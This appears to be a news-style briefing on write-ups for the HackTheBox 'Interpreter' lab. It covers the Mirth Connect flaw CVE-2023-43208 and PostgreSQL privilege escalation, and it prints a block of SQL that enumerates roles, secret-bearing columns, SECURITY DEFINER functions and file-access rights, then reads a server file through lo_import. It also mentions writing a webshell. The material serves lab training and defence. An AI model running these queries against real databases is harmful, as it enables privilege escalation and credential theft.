Write-ups Emerge for HackTheBox 'Interpreter'

Published by The Daily Scout

What happened

Multiple users have successfully compromised the medium-difficulty "Interpreter" machine on the HackTheBox platform. Published write-ups detail an attack path that involves exploiting a vulnerable Mirth Connect instance and performing deep PostgreSQL enumeration. The challenge requires chained attacks and creative pivoting to achieve privilege escalation.

Why it matters

  • The initial exploit likely targets CVE-2023-43208, a critical (CVSS 9.8) unauthenticated remote code execution vulnerability in Mirth Connect. It stems from an incomplete patch for an earlier issue, CVE-2023-37679, and lets an attacker execute arbitrary code without any credentials.
  • The root cause is insecure deserialization of XML payloads with the XStream library, reachable through a specially crafted HTTP request to the Mirth Connect API. Exploitation is considered straightforward, and public proof-of-concept exploits are available.
  • Mirth Connect is a widely used open-source data integration platform in the healthcare industry, so its vulnerabilities are particularly high-impact. Because the service often runs with high privileges (for example as SYSTEM on Windows), a compromised server is a ready pivot point into a healthcare network.
  • After gaining initial access, a penetration tester would enumerate the internal network and services. On the "Interpreter" machine this leads to the discovery of a PostgreSQL database instance.
  • PostgreSQL enumeration means identifying databases, schemas, tables and roles to find sensitive data or privilege escalation paths. `psql`, or modules from frameworks such as Metasploit, can connect to the database and probe for weaknesses.
  • A common PostgreSQL privilege escalation technique abuses misconfigured permissions on functions. A `SECURITY DEFINER` function runs with the privileges of its owner rather than of the caller; if such a function is owned by a superuser, is executable by a low-privileged role, and does something the caller can steer (dynamic SQL, file I/O, `COPY`), the caller effectively acts as the superuser and can take full control of the database.
  • Another vector is reading or writing files on the underlying operating system through server-side functions such as `lo_import` and `lo_export` (or `pg_read_file` and `COPY ... TO/FROM PROGRAM`). By default these are restricted to superusers or to members of roles such as `pg_read_server_files`, but when they have been granted to a low-privileged role an attacker can read sensitive configuration files or write a webshell to gain further access.
  • The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-43208 to its Known Exploited Vulnerabilities (KEV) catalog in May 2024, indicating active exploitation in the wild by threat actors, including state-sponsored groups.
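The PostgreSQL enumeration and privilege-escalation checks described above, as a worked example added to this briefing (it is not taken from any of the "Interpreter" write-ups, and the machine's actual database layout is not known here). It assumes a `psql` session as the low-privileged role obtained during the engagement, a PostgreSQL 11 or newer server (the `pg_*_server_*` predefined roles do not exist earlier and `pg_has_role` would error on them), and uses `/etc/hostname` only as an illustrative file path.

```sql
-- Added example (not from the write-ups): PostgreSQL enumeration and
-- privilege-escalation checks, run from psql as a low-privileged role.

-- 1. Who are we, and is our role already privileged?
SELECT current_user, current_database(),
       rolsuper, rolcreaterole, rolcreatedb, rolbypassrls
FROM pg_roles WHERE rolname = current_user;

-- Every role, whether it is a superuser, and which roles it is a member of.
SELECT r.rolname, r.rolsuper,
       ARRAY(SELECT g.rolname
             FROM pg_auth_members m JOIN pg_roles g ON g.oid = m.roleid
             WHERE m.member = r.oid) AS member_of
FROM pg_roles r
ORDER BY r.rolsuper DESC, r.rolname;

-- 2. Databases, schemas and tables that hold application data.
--    pg_tables lists every table, not only those we already have privileges on
--    (information_schema.tables hides the rest).
SELECT datname FROM pg_database WHERE NOT datistemplate;

SELECT nspname AS schema FROM pg_namespace
WHERE nspname NOT IN ('pg_catalog', 'information_schema')
  AND nspname NOT LIKE 'pg_toast%';

SELECT schemaname, tablename, tableowner
FROM pg_tables
WHERE schemaname NOT IN ('pg_catalog', 'information_schema')
ORDER BY 1, 2;

-- Columns whose names suggest credentials or secrets.
SELECT table_schema, table_name, column_name, data_type
FROM information_schema.columns
WHERE table_schema NOT IN ('pg_catalog', 'information_schema')
  AND column_name ~* '(pass|pwd|secret|token|api_?key|hash)';

-- 3. SECURITY DEFINER functions. These run with the OWNER's privileges, not the
--    caller's; one owned by a superuser, executable by us, and doing something we
--    can influence (dynamic SQL, file I/O, COPY) is a direct path to superuser.
SELECT n.nspname AS schema,
       p.proname AS function,
       pg_get_function_identity_arguments(p.oid) AS args,
       o.rolname AS owner,
       o.rolsuper AS owner_is_superuser,
       has_function_privilege(current_user, p.oid, 'EXECUTE') AS we_can_execute,
       p.prosrc AS source
FROM pg_proc p
JOIN pg_namespace n ON n.oid = p.pronamespace
JOIN pg_roles o ON o.oid = p.proowner
WHERE p.prosecdef
  AND n.nspname NOT IN ('pg_catalog', 'information_schema')
ORDER BY o.rolsuper DESC, 1, 2;

-- 4. Reach into the server's file system. lo_import/lo_export are superuser-only
--    unless EXECUTE was explicitly granted; pg_read_file and COPY FROM/TO a file
--    or PROGRAM are gated by the predefined pg_*_server_* roles (PostgreSQL 11+).
SELECT has_function_privilege(current_user, 'lo_import(text)', 'EXECUTE')     AS lo_import,
       has_function_privilege(current_user, 'lo_export(oid,text)', 'EXECUTE') AS lo_export,
       has_function_privilege(current_user, 'pg_read_file(text)', 'EXECUTE')  AS pg_read_file,
       pg_has_role(current_user, 'pg_read_server_files', 'MEMBER')            AS read_server_files,
       pg_has_role(current_user, 'pg_write_server_files', 'MEMBER')           AS write_server_files,
       pg_has_role(current_user, 'pg_execute_server_program', 'MEMBER')       AS execute_server_program;

-- 5. If lo_import is available: read a file through a large object. The path is
--    an illustrative placeholder; on a real target it would be whatever config
--    file holds credentials. \gset is a psql command that stores the result
--    column in the :oid variable. lo_export(oid, path) is the write counterpart
--    (e.g. placing a webshell in a web root); lo_unlink removes the object.
SELECT lo_import('/etc/hostname') AS oid \gset
SELECT encode(lo_get(:oid), 'escape') AS file_contents;
SELECT lo_unlink(:oid);
```

Any row in step 3 with `owner_is_superuser = true` and `we_can_execute = true` deserves a read of its `source`; any `true` in step 4 means the database role already has operating-system reach and the escalation is no longer about the database at all.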

Key numbers

  • The initial exploit likely targets CVE-2023-43208, a critical unauthenticated remote code execution vulnerability in Mirth Connect with a CVSS score of 9.8.
  • This vulnerability stems from an incomplete patch for a previous issue (CVE-2023-37679) and allows attackers to execute arbitrary code without needing any credentials.
  • The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-43208 to its Known Exploited Vulnerabilities (KEV) catalog in May 2024, indicating active exploitation in the wild by threat actors, including state-sponsored groups.

What happens next

  • The initial exploit likely targets CVE-2023-43208, a critical unauthenticated remote code execution vulnerability in Mirth Connect with a CVSS score of 9.8.
  • For instance, if a low-privileged user can execute a SECURITY DEFINER function owned by a superuser, which runs with the owner's privileges rather than the caller's, they may be able to gain full control of the database.
  • This could allow an attacker to read sensitive configuration files or write a webshell to gain further access.

